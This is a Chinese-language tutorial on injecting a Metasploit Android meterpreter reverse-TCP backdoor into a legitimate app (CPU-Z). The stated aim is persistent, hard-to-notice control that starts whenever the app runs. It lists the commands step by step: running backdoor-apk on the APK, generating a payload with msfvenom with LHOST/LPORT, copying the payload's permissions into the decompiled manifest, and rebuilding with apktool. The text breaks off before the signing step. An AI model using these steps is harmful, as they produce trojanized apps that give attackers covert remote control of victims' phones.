對Android應用植入後門實現msf控制

新聞 11-03

本人剛入msf坑不久，對於Android的滲透比較感興趣，於是在網上尋找了很久資料，但是發現很多實現方法都會出現各種奇怪報錯，於是我花了點時間，在外面的世界找解決方案，總算實現成功，故整理文章，供正在困惑和迷茫中掙扎的小夥伴們互相交流。

下面進入正題：我們的思路是對一個安卓應用注入msf生成的payload後門，並實現內網範圍或是外網範圍內的持續控制，這樣就會實現後門隨正常應用啟動，但不易被發現。文中會提供一些思路拓展，如果需要，我可以再展開來講。對於很多萌新來說，過程中往往會遇到很多解決不了的麻煩，我會在文章中儘可能覆蓋。

第一步，工具準備：

a) Kali 2017.02（https://www.kali.org/downloads/）

b) backdoor-apk（https://github.com/dana-at-cp/backdoor-apk.git）

c) Apktool（https://ibotpeaches.github.io/Apktool/）

d) 測試Apk：CPU-Z（https://pan.baidu.com/s/1kUHN2YV）

第二步，環境處理：

這一步也是很多小夥伴們最大的問題之一，Kali中自帶的Apktool版本較舊，導致關鍵步驟失敗，下面看步驟。

a) 下載最新版Apktool（上文已提供鏈接），下載成功後將文件名修改為apktool.jar，複製粘貼替換掉kali中的/usr/share/apktool/apktool.jar

b) 下載backdoor-apk：打開終端，輸入命令git clone https://github.com/dana-at-cp/backdoor-apk.git，回車。

c) 安裝兼容庫：終端內輸入命令 apt-get install lib32stdc++6 lib32ncurses5 lib32z1，回車。由於我這裡已經安裝完成，故不再演示。

d) 運行backdoor-apk：終端輸入命令cd backdoor-apk/backdoor-apk，回車。

e) 下載CPU-Z，並將其改名為1.apk，移動到/root/backdoor-apk/backdoor-apk目錄下（註：與腳本同目錄）。

f) 注入payload：終端輸入命令./backdoor-apk.sh 1.apk，回車。

g) 打開新終端，輸入命令ifconfig查看自己的ip。

h) 回到我們之前的終端，配置payload參數，按照圖中的配置，其中IP替換為自己的IP。

i) 此時，payload已經成功注入我們的CPU-Z中，但是很多小夥伴會發現，安裝後無法正常使用功能，這時候就需要為其添加許可權，首先找到我們生成的CPU-Z，生成在/root/backdoor-apk/backdoor-apk/original/dist目錄下。

j) 接下來，使用Apktool反編譯此文件。為了方便區分，我們將此apk名修改為2.apk，並移動到root目錄下。

k) 下面使用Apktool反編譯，打開終端，輸入命令apktool d /root/2.apk，回車。

l) 此時我們的apk已經反編譯完成，打開目錄2下的AndroidManifest.xml，我們會發現此時這個apk所聲明的許可權很少，並不能實現我們所需要的功能，此時就需要聲明更多許可權。

m) 此時很多小夥伴就會有疑問：我對android代碼一無所知，怎麼知道我們的payload需要些什麼許可權呢？這可難不倒我們，我們可以用msf生成一個原始的payload，反編譯這個apk，去查看它聲明了哪些許可權，複製進來就可以了，下面我們繼續操作。

n) 在終端中輸入命令msfvenom -p android/meterpreter/reverse_tcp LHOST=10.161.94.25 LPORT=4444 -o 3.apk，就可以在root目錄下生成一個3.apk的payload，並且按照我們之前k中的步驟反編譯。

o) 此時，反編譯已經完成，我們來看看payload聲明了哪些許可權。

p) 好的，我們複製這些代碼到我們2目錄下的相同位置處並保存，但要注意不能重複聲明。

q) 此時我們最關鍵的聲明許可權步驟已經完成，接下來要做的就是使用Apktool打包應用，並為其添加簽名。終端中輸入命令，apktool b /root/，回車，此時應用打包就完成了。新應用會存放在/root/2/dist/2.apk這個位置。為了方便區分，我們將其文件名修改為4.apk，並移動到root目錄下。當然，此時的應用還是未簽名的，下一步，我們對其進行簽名操作。